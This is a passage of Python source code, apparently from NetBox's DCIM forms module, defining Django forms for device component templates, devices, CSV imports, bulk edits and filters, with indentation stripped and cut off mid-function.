# Limit power_port choices to current DeviceType
device_type = DeviceType.objects.get(
pk=self.initial.get('device_type') or self.data.get('device_type')
)
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
device_type=device_type
)
class PowerOutletTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerOutletTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
device_type = forms.ModelChoiceField(
queryset=DeviceType.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False,
widget=StaticSelect2()
)
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'power_port', 'feed_leg', 'description')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPortTemplates which belong to the parent DeviceType
if 'device_type' in self.initial:
device_type = DeviceType.objects.filter(pk=self.initial['device_type']).first()
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(device_type=device_type)
else:
self.fields['power_port'].choices = ()
self.fields['power_port'].widget.attrs['disabled'] = True
class InterfaceTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = InterfaceTemplate
fields = [
'device_type', 'name', 'label', 'type', 'mgmt_only', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'type': StaticSelect2(),
}
class InterfaceTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices,
widget=StaticSelect2()
)
mgmt_only = forms.BooleanField(
required=False,
label='Management only'
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'mgmt_only', 'description')
class InterfaceTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=InterfaceTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(InterfaceTypeChoices),
required=False,
widget=StaticSelect2()
)
mgmt_only = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Management only'
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'description')
class FrontPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = FrontPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'rear_port': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit rear_port choices to current DeviceType
if hasattr(self.instance, 'device_type'):
self.fields['rear_port'].queryset = RearPortTemplate.objects.filter(
device_type=self.instance.device_type
)
class FrontPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2()
)
rear_port_set = forms.MultipleChoiceField(
choices=[],
label='Rear ports',
help_text='Select one rear port assignment for each front port being created.',
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
device_type = DeviceType.objects.get(
pk=self.initial.get('device_type') or self.data.get('device_type')
)
# Determine which rear port positions are occupied. These will be excluded from the list of available mappings.
occupied_port_positions = [
(front_port.rear_port_id, front_port.rear_port_position)
for front_port in device_type.frontporttemplates.all()
]
# Populate rear port choices
choices = []
rear_ports = RearPortTemplate.objects.filter(device_type=device_type)
for rear_port in rear_ports:
for i in range(1, rear_port.positions + 1):
if (rear_port.pk, i) not in occupied_port_positions:
choices.append(
('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
)
self.fields['rear_port_set'].choices = choices
def clean(self):
super().clean()
# Validate that the number of ports being created equals the number of selected (rear port, position) tuples
front_port_count = len(self.cleaned_data['name_pattern'])
rear_port_count = len(self.cleaned_data['rear_port_set'])
if front_port_count != rear_port_count:
raise forms.ValidationError({
'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
'were selected. These counts must match.'.format(front_port_count, rear_port_count)
})
def get_iterative_data(self, iteration):
# Assign rear port and position from selected set
rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
return {
'rear_port': int(rear_port),
'rear_port_position': int(position),
}
class FrontPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=FrontPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('description',)
class RearPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = RearPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'positions', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'type': StaticSelect2(),
}
class RearPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
positions = forms.IntegerField(
min_value=REARPORT_POSITIONS_MIN,
max_value=REARPORT_POSITIONS_MAX,
initial=1,
help_text='The number of front ports which may be mapped to each rear port'
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'positions', 'description')
class RearPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=RearPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('description',)
class DeviceBayTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = DeviceBayTemplate
fields = [
'device_type', 'name', 'label', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class DeviceBayTemplateCreateForm(ComponentTemplateCreateForm):
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'description')
class DeviceBayTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceBayTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'description')
#
# Component template import forms
#
class ComponentTemplateImportForm(BootstrapMixin, forms.ModelForm):
def __init__(self, device_type, data=None, *args, **kwargs):
# Must pass the parent DeviceType on form initialization
data.update({
'device_type': device_type.pk,
})
super().__init__(data, *args, **kwargs)
def clean_device_type(self):
data = self.cleaned_data['device_type']
# Limit fields referencing other components to the parent DeviceType
for field_name, field in self.fields.items():
if isinstance(field, forms.ModelChoiceField) and field_name != 'device_type':
field.queryset = field.queryset.filter(device_type=data)
return data
class ConsolePortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = ConsolePortTemplate
fields = [
'device_type', 'name', 'label', 'type',
]
class ConsoleServerPortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = ConsoleServerPortTemplate
fields = [
'device_type', 'name', 'label', 'type',
]
class PowerPortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = PowerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw',
]
class PowerOutletTemplateImportForm(ComponentTemplateImportForm):
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = PowerOutletTemplate
fields = [
'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg',
]
class InterfaceTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices.CHOICES
)
class Meta:
model = InterfaceTemplate
fields = [
'device_type', 'name', 'label', 'type', 'mgmt_only',
]
class FrontPortTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=PortTypeChoices.CHOICES
)
rear_port = forms.ModelChoiceField(
queryset=RearPortTemplate.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = FrontPortTemplate
fields = [
'device_type', 'name', 'type', 'rear_port', 'rear_port_position',
]
class RearPortTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=PortTypeChoices.CHOICES
)
class Meta:
model = RearPortTemplate
fields = [
'device_type', 'name', 'type', 'positions',
]
class DeviceBayTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = DeviceBayTemplate
fields = [
'device_type', 'name',
]
#
# Device roles
#
class DeviceRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = DeviceRole
fields = [
'name', 'slug', 'color', 'vm_role', 'description',
]
class DeviceRoleCSVForm(CSVModelForm):
slug = SlugField()
class Meta:
model = DeviceRole
fields = DeviceRole.csv_headers
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
#
# Platforms
#
class PlatformForm(BootstrapMixin, forms.ModelForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
slug = SlugField(
max_length=64
)
class Meta:
model = Platform
fields = [
'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description',
]
widgets = {
'napalm_args': SmallTextarea(),
}
class PlatformCSVForm(CSVModelForm):
slug = SlugField()
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
to_field_name='name',
help_text='Limit platform assignments to this manufacturer'
)
class Meta:
model = Platform
fields = Platform.csv_headers
#
# Devices
#
class DeviceForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site'
},
initial_params={
'racks': '$rack'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site',
'group_id': '$rack_group',
}
)
position = forms.IntegerField(
required=False,
help_text="The lowest-numbered unit occupied by the device",
widget=APISelect(
api_url='/api/dcim/racks/{{rack}}/elevation/',
attrs={
'disabled-indicator': 'device',
'data-query-param-face': "[\"$face\"]",
}
)
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
initial_params={
'device_types': '$device_type'
}
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
device_role = DynamicModelChoiceField(
queryset=DeviceRole.objects.all()
)
platform = DynamicModelChoiceField(
queryset=Platform.objects.all(),
required=False,
query_params={
'manufacturer_id': ['$manufacturer', 'null']
}
)
cluster_group = DynamicModelChoiceField(
queryset=ClusterGroup.objects.all(),
required=False,
null_option='None',
initial_params={
'clusters': '$cluster'
}
)
cluster = DynamicModelChoiceField(
queryset=Cluster.objects.all(),
required=False,
query_params={
'group_id': '$cluster_group'
}
)
comments = CommentField()
local_context_data = JSONField(
required=False,
label=''
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Device
fields = [
'name', 'device_role', 'device_type', 'serial', 'asset_tag', 'site', 'rack', 'position', 'face',
'status', 'platform', 'primary_ip4', 'primary_ip6', 'cluster_group', 'cluster', 'tenant_group', 'tenant',
'comments', 'tags', 'local_context_data'
]
help_texts = {
'device_role': "The function this device serves",
'serial': "Chassis serial number",
'local_context_data': "Local config context data overwrites all source contexts in the final rendered "
"config context",
}
widgets = {
'face': StaticSelect2(),
'status': StaticSelect2(),
'primary_ip4': StaticSelect2(),
'primary_ip6': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.instance.pk:
# Compile list of choices for primary IPv4 and IPv6 addresses
for family in [4, 6]:
ip_choices = [(None, '---------')]
# Gather PKs of all interfaces belonging to this Device or a peer VirtualChassis member
interface_ids = self.instance.vc_interfaces.values_list('pk', flat=True)
# Collect interface IPs
interface_ips = IPAddress.objects.filter(
address__family=family,
assigned_object_type=ContentType.objects.get_for_model(Interface),
assigned_object_id__in=interface_ids
).prefetch_related('assigned_object')
if interface_ips:
ip_list = [(ip.id, f'{ip.address} ({ip.assigned_object})') for ip in interface_ips]
ip_choices.append(('Interface IPs', ip_list))
# Collect NAT IPs
nat_ips = IPAddress.objects.prefetch_related('nat_inside').filter(
address__family=family,
nat_inside__assigned_object_type=ContentType.objects.get_for_model(Interface),
nat_inside__assigned_object_id__in=interface_ids
).prefetch_related('assigned_object')
if nat_ips:
ip_list = [(ip.id, f'{ip.address} (NAT)') for ip in nat_ips]
ip_choices.append(('NAT IPs', ip_list))
self.fields['primary_ip{}'.format(family)].choices = ip_choices
# If editing an existing device, exclude it from the list of occupied rack units. This ensures that a device
# can be flipped from one face to another.
self.fields['position'].widget.add_query_param('exclude', self.instance.pk)
# Limit platform by manufacturer
self.fields['platform'].queryset = Platform.objects.filter(
Q(manufacturer__isnull=True) | Q(manufacturer=self.instance.device_type.manufacturer)
)
# Disable rack assignment if this is a child device installed in a parent device
if self.instance.device_type.is_child_device and hasattr(self.instance, 'parent_bay'):
self.fields['site'].disabled = True
self.fields['rack'].disabled = True
self.initial['site'] = self.instance.parent_bay.device.site_id
self.initial['rack'] = self.instance.parent_bay.device.rack_id
else:
# An object that doesn't exist yet can't have any IPs assigned to it
self.fields['primary_ip4'].choices = []
self.fields['primary_ip4'].widget.attrs['readonly'] = True
self.fields['primary_ip6'].choices = []
self.fields['primary_ip6'].widget.attrs['readonly'] = True
# Rack position
position = self.data.get('position') or self.initial.get('position')
if position:
self.fields['position'].widget.choices = [(position, f'U{position}')]
class BaseDeviceCSVForm(CustomFieldModelCSVForm):
device_role = CSVModelChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='name',
help_text='Assigned role'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name',
help_text='Device type manufacturer'
)
device_type = CSVModelChoiceField(
queryset=DeviceType.objects.all(),
to_field_name='model',
help_text='Device type model'
)
platform = CSVModelChoiceField(
queryset=Platform.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned platform'
)
status = CSVChoiceField(
choices=DeviceStatusChoices,
help_text='Operational status'
)
cluster = CSVModelChoiceField(
queryset=Cluster.objects.all(),
to_field_name='name',
required=False,
help_text='Virtualization cluster'
)
class Meta:
fields = []
model = Device
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit device type queryset by manufacturer
params = {f"manufacturer__{self.fields["manufacturer"].to_field_name}": data.get('manufacturer')}
self.fields['device_type'].queryset = self.fields['device_type'].queryset.filter(**params)
class DeviceCSVForm(BaseDeviceCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
required=False,
help_text="Assigned rack"
)
face = CSVChoiceField(
choices=DeviceFaceChoices,
required=False,
help_text='Mounted rack face'
)
class Meta(BaseDeviceCSVForm.Meta):
fields = [
'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
'site', 'rack_group', 'rack', 'position', 'face', 'cluster', 'comments',
]
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit rack_group queryset by assigned site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by assigned site and group
params = {
f"site__{self.fields["site"].to_field_name}": data.get('site'),
f"group__{self.fields["rack_group"].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class ChildDeviceCSVForm(BaseDeviceCSVForm):
parent = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Parent device'
)
device_bay = CSVModelChoiceField(
queryset=DeviceBay.objects.all(),
to_field_name='name',
help_text='Device bay in which this device is installed'
)
class Meta(BaseDeviceCSVForm.Meta):
fields = [
'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
'parent', 'device_bay', 'cluster', 'comments',
]
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit device bay queryset by parent device
params = {f"device__{self.fields["parent"].to_field_name}": data.get('parent')}
self.fields['device_bay'].queryset = self.fields['device_bay'].queryset.filter(**params)
def clean(self):
super().clean()
# Set parent_bay reverse relationship
device_bay = self.cleaned_data.get('device_bay')
if device_bay:
self.instance.parent_bay = device_bay
# Inherit site and rack from parent device
parent = self.cleaned_data.get('parent')
if parent:
self.instance.site = parent.site
self.instance.rack = parent.rack
class DeviceBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
required=False,
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
device_role = DynamicModelChoiceField(
queryset=DeviceRole.objects.all(),
required=False
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
platform = DynamicModelChoiceField(
queryset=Platform.objects.all(),
required=False
)
status = forms.ChoiceField(
choices=add_blank_choice(DeviceStatusChoices),
required=False,
widget=StaticSelect2()
)
serial = forms.CharField(
max_length=50,
required=False,
label='Serial Number'
)
class Meta:
nullable_fields = [
'tenant', 'platform', 'serial',
]
class DeviceFilterForm(BootstrapMixin, LocalConfigContextFilterForm, TenancyFilterForm, CustomFieldFilterForm):
model = Device
field_order = [
'q', 'region', 'site', 'rack_group_id', 'rack_id', 'status', 'role', 'tenant_group', 'tenant',
'manufacturer_id', 'device_type_id', 'mac_address', 'has_primary_ip',
]
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
rack_group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group',
query_params={
'site': '$site'
}
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site',
'group_id': '$rack_group_id',
}
)
role = DynamicModelMultipleChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='slug',
required=False
)
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False,
label='Manufacturer'
)
device_type_id = DynamicModelMultipleChoiceField(
queryset=DeviceType.objects.all(),
required=False,
label='Model',
display_field='model',
query_params={
'manufacturer': '$manufacturer'
}
)
platform = DynamicModelMultipleChoiceField(
queryset=Platform.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
status = forms.MultipleChoiceField(
choices=DeviceStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
mac_address = forms.CharField(
required=False,
label='MAC address'
)
has_primary_ip = forms.NullBooleanField(
required=False,
label='Has a primary IP',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
virtual_chassis_member = forms.NullBooleanField(
required=False,
label='Virtual chassis member',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_ports = forms.NullBooleanField(
required=False,
label='Has console ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_server_ports = forms.NullBooleanField(
required=False,
label='Has console server ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_ports = forms.NullBooleanField(
required=False,
label='Has power ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_outlets = forms.NullBooleanField(
required=False,
label='Has power outlets',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
interfaces = forms.NullBooleanField(
required=False,
label='Has interfaces',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
pass_through_ports = forms.NullBooleanField(
required=False,
label='Has pass-through ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Device components
#
class ComponentCreateForm(ComponentForm):
"""
Base form for the creation of device components (models subclassed from ComponentModel).
"""
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name'
)
description = forms.CharField(
max_length=100,
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class DeviceBulkAddComponentForm(ComponentForm):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
description = forms.CharField(
max_length=100,
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
#
# Console ports
#
class ConsolePortFilterForm(DeviceComponentFilterForm):
model = ConsolePort
type = forms.MultipleChoiceField(
choices=ConsolePortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class ConsolePortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = ConsolePort
fields = [
'device', 'name', 'label', 'type', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class ConsolePortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkCreateForm(
form_from_model(ConsolePort, ['type']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkEditForm(
form_from_model(ConsolePort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=ConsolePort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class ConsolePortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = ConsolePort
fields = ConsolePort.csv_headers
#
# Console server ports
#
class ConsoleServerPortFilterForm(DeviceComponentFilterForm):
model = ConsoleServerPort
type = forms.MultipleChoiceField(
choices=ConsolePortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class ConsoleServerPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = ConsoleServerPort
fields = [
'device', 'name', 'label', 'type', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class ConsoleServerPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkCreateForm(
form_from_model(ConsoleServerPort, ['type']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkEditForm(
form_from_model(ConsoleServerPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=ConsoleServerPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class ConsoleServerPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = ConsoleServerPort
fields = ConsoleServerPort.csv_headers
#
# Power ports
#
class PowerPortFilterForm(DeviceComponentFilterForm):
model = PowerPort
type = forms.MultipleChoiceField(
choices=PowerPortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class PowerPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerPort
fields = [
'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class PowerPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False,
widget=StaticSelect2()
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum draw in watts"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated draw in watts"
)
field_order = (
'device', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
)
class PowerPortBulkCreateForm(
form_from_model(PowerPort, ['type', 'maximum_draw', 'allocated_draw']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags')
class PowerPortBulkEditForm(
form_from_model(PowerPort, ['label', 'type', 'maximum_draw', 'allocated_draw', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class PowerPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
class Meta:
model = PowerPort
fields = PowerPort.csv_headers
#
# Power outlets
#
class PowerOutletFilterForm(DeviceComponentFilterForm):
model = PowerOutlet
type = forms.MultipleChoiceField(
choices=PowerOutletTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class PowerOutletForm(BootstrapMixin, forms.ModelForm):
power_port = forms.ModelChoiceField(
queryset=PowerPort.objects.all(),
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = PowerOutlet
fields = [
'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port choices to the local device
if hasattr(self.instance, 'device'):
self.fields['power_port'].queryset = PowerPort.objects.filter(
device=self.instance.device
)
class PowerOutletCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False,
widget=StaticSelect2()
)
power_port = forms.ModelChoiceField(
queryset=PowerPort.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg', 'description', 'tags')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPorts which belong to the parent Device
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
class PowerOutletBulkCreateForm(
form_from_model(PowerOutlet, ['type', 'feed_leg']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'feed_leg', 'description', 'tags')
class PowerOutletBulkEditForm(
form_from_model(PowerOutlet, ['label', 'type', 'feed_leg', 'power_port', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=PowerOutlet.objects.all(),
widget=forms.MultipleHiddenInput()
)
device = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
class Meta:
nullable_fields = ('label', 'type', 'feed_leg', 'power_port', 'description')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPorts which belong to the parent Device
if 'device' in self.initial:
device = Device.objects.filter(pk=self.initial['device']).first()
self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
else:
self.fields['power_port'].choices = ()
self.fields['power_port'].widget.attrs['disabled'] = True
class PowerOutletCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
power_port = CSVModelChoiceField(
queryset=PowerPort.objects.all(),
required=False,
to_field_name='name',
help_text='Local power port which feeds this outlet'
)
feed_leg = CSVChoiceField(
choices=PowerOutletFeedLegChoices,
required=False,
help_text='Electrical phase (for three-phase circuits)'
)
class Meta:
model = PowerOutlet
fields = PowerOutlet.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit PowerPort choices to those belonging to this device (or VC master)
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
